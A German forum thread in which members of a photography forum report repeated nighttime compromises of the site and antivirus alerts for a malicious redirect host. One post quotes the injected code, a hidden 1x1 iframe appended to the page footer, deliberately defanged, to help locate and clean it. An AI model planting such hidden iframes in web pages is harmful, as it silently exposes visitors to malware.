• Herzlich willkommen im "neuen" DSLR-Forum!

    Wir hoffen, dass Euch das neue Design und die neuen Features gefallen und Ihr Euch schnell zurechtfindet.
    Wir werden wohl alle etwas Zeit brauchen, um uns in die neue Umgebung einzuleben. Auch für uns ist das alles neu.

    Euer DSLR-Forum-Team

  • In eigener Sache!

    Liebe Mitglieder, liebe Besucher und Gäste
    ich weiß, es ist ein leidiges Thema, aber ich muss es ansprechen: Werbung, Werbeblocker und Finanzierung des Forums.
    Bitte hier weiterlesen ...

  • DSLR-Forum Fotowettbewerb neu erfunden!
    Nach wochenlanger intensiver Arbeit an der Erneuerung des Formates unseres internen Fotowettbewerbes ist es Frosty als Moderator
    und au lait als Programmierer gelungen, unseren Wettbewerb auf ein völlig neues Level zu heben!
    Lest hier alle Infos zum DSLR-Forum Fotowettbewerb 2.0
    Einen voll funktionsfähigen Demowettbewerb kannst du dir hier ansehen.
  • Neuer Partner: AkkuShop.de
    Akkus, Ladegeräte und mehr (nicht nur) für Digitalkameras und Drohnen
  • Neuer Gutscheincode unseres Partners Schutzfolien24:
    DSLR-Forum2024
    Dauerhaft 10% Rabatt auf alle Displayschutzfolien der Eigenmarken "Upscreen", "Brotec", "Savvies".
    Der Code ist für alle Geräteklassen gültig.
  • Stimmt ab über die Sieger des DSLR-Forum Fotowettbewerbs Mai 2024.
    Thema: "Diagonale"

    Nur noch bis zum 31.05.2024 23:59!
    Jeder darf abstimmen!
    Zur Abstimmung und Bewertung hier lang
WERBUNG

Forum schon wieder verseucht ?

Status
Für weitere Antworten geschlossen.
Schaltet mal wieder auf Solidarität um! Und letztlich interessieren mich auch keine persönlichen Hilferufe. Wenn ihr im Supportbereich des Forums helfen wollt, dann schreibt als Geschädigte zumindest mal den Virennamen (und das AV-Programm) dazu, mich interessiert, ob der Downloader (aktuelle) immer den gleichen Virus/Trojaner raufpackt, oder ob es Zufall/Variationen gibt.

Im Endeffekt geht (hier) es um das Forum und eine Hilfestellung zur Sicherung des Servers. Für alle anderen gibt es zuhauf spezialisierte Foren, die mit Sicherheit schon ganz viel Text bereithalten.

mfg chmee
 
Inzwischen scheint es sich hauptsächlich Nachts abzuspielen.
Da nur Rüdiger oder Thomas befugt sind, in das Forum "administrativ"
einzugreifen, bleibt das "wilde Tier" dann meistens die Nacht über
aktiv im Forum und kann viele User "verseuchen".

Also, da ist nichts mit 6 Stunden Intervall, aber man kann sicher sein,
wenn, dann hauptsächlich Nachts.
 
Hallo!

Mein Kasper meldet beim Aufrufen des Forums und bei
jedem Klick auf einen Link:

"http://ixv36481.ipq.co/?r=302

Der Link wurde in einer Datenbank gefunden

Ergebnis: verboten"

Könnt Ihr damit was anfangen?

Gruß

Canophil
 
Das ist heute schon das dritte mal, das mein Virenscanner anschlägt, langsam verliere ich die Lust auf dieses Forum, das zieht sich ja jetzt schon über Wochen hin...
 
Das ist heute schon das dritte mal, das mein Virenscanner anschlägt, langsam verliere ich die Lust auf dieses Forum, das zieht sich ja jetzt schon über Wochen hin...

Was denn, erst zum dritten Mal? :devilish:

Scherz beiseite. Solange deine Sicherheitsvorkehrungen greifen, ist doch alles ok. Ok, es nervt etwas, aber das ist doch schon alles.
 
Ja, ich sehe das "Dings".

Jetzt links ganz unten :grumble:


Echt Mist! Ich wünsch den Betreibern den Nerven und Erfolg, dieser Schweinerei endlich ein Ende zu bereiten.

Gruß
ewm
 
Zuletzt bearbeitet:
stellt sich die Frage, ob die Sicherheitsvorkehrungen in Zukunft auch greifen, oder ob mal ein gut getarntes Tierchen zum Angriff bläst. Oder ob es nicht langweilig wird, wenn hier nicht mehr sooo viel passiert und man sich dann neues ausdenkt mit einer höheren Schadenswirkung.
 
Auch bei mir werden gegenwärtig wieder Zugriffe nach ixv36481.ipq.co/?r=302 geblockt - RequestPolicy (Firefox Addon) ist da glücklicherweise sehr zuverlässig.
Erstaunlicherweise erfolgen die Zugriffsversuche sogar, obwohl Javascript per NoScript deaktiviert ist.

Gibt es eigentlich eine schnelle Möglichkeit, um Rüdiger jeweils Bescheid zu sagen?

Schon bemerkenswert, wie schnell von der Gegenseite das Forum immer wieder gehackt/manipuliert wird, da scheint eine nicht unerhebliche kriminelle Energie vorhanden zu sein.

MfG, Jürgen
 
Zuletzt bearbeitet:
Warum wird das eigentlich immer wieder an andere Stellen geschrieben?

Diesmal steht es ganz am Ende der Seiten:
Code:
<script type="text/javascript">
<!--
	// Main vBulletin Javascript Initialization
	vBulletin_init();
//-->
</script>[COLOR="Red"][B]<iframe src='h[U]xx[/U]p://ixv36481[U],[/U]ipq[U],[/U]co/?r=302' border='0' height='1' width='1'></iframe>[/B][/COLOR]
Ich hab's etwas verändert (unterstrichene Stellen), damit keine Virenscanner nur wegen dieses Posts anschlagen.

P.S. Ist das korrekt, dass vBulletin_init(); auskommentiert ist, oder wurde das auch vom Angreifer manipuliert? Edit: Das war eine wirklich dumme Frage :eek:
 
Zuletzt bearbeitet:
stellt sich die Frage, ob die Sicherheitsvorkehrungen in Zukunft auch greifen, oder ob mal ein gut getarntes Tierchen zum Angriff bläst. Oder ob es nicht langweilig wird, wenn hier nicht mehr sooo viel passiert und man sich dann neues ausdenkt mit einer höheren Schadenswirkung.

Auch wenn ich mich wiederhole: Browser in die Sandbox, und das Risiko ist in Verbindung mit den üblichen Schutzprogrammen extrem niedrig.
 
Ich kann nicht verstehen, was diese schwachsinnigen Anstachelungen hier sollen?
Vielleicht solltest Du mal alles lesen, dann wüsstest Du, wie gering die Bedrohung für Windows User ist.

also so polemisch sehe ich das nicht auch schreibe ich keinen Schwachsinn... mich wundert es nur dass hier irgend welche Flecken auf dem DSLR Logo gesehen werden die dann den PC mit Anschlägen quälen... man liest von genervten User, ja sogar von empörten User die den Rücken dem DSLR Forum gedreht hatten, andere versuchen hier irgend welche NO-JS’s zu installieren um sich zu schützen... und vieles mehr... ich verfolge diesen Thread seit Anfang an und kann mir einen objektiven Überblick verschaffen, all das was hier erwähnt wurde habe ich hier nur von der Seite still beobachtet ohne davon selber betroffen zu sein...

die Bedrohung für Windows User hängt von seinen Kenntnisstand in der Thematik der Sicherheit ab und gerade damit haben sich hier die meisten geschlagen, nur (sehr) wenige konnten ihre PC’s in stille halten...

und diese von mir zusammengefasste Tatsache nennst du Schwachsinn? solch unangebrachte Sprüche zeugen von praxisfremden Denkweise und basieren auf Gefühlsebene... mehr sage ich nichts dazu.

Und wo ist der Supportbezug bei diesem überflüssigen Gechatte? Steffen
 
Zuletzt bearbeitet von einem Moderator:
Ich habe schon seit Tagen angeregt einen Notfallplan bzw. eine
Ausweitung der Kompetenzen der Moderatoren einzuführen.
Aber, es wird wohl wieder so sein, wie Montag Nacht und letzte Nacht,
das Tier darf hier seine Nacht verbringen.
 
Auch wenn ich mich wiederhole: Browser in die Sandbox, und das Risiko ist in Verbindung mit den üblichen Schutzprogrammen extrem niedrig.

Dann kläre bitte mal ob Nutzer mit IE8 auch betroffen sind. Der Sandbox - Betrieb des IE8 als Standard- Einstellung wird doch propagiert.

Ganz normal installiert, ohne Sandiebox.

Ist das wirklich so ???

Gruß
ewm
 
Zuletzt bearbeitet:
Status
Für weitere Antworten geschlossen.
WERBUNG
Zurück
Oben Unten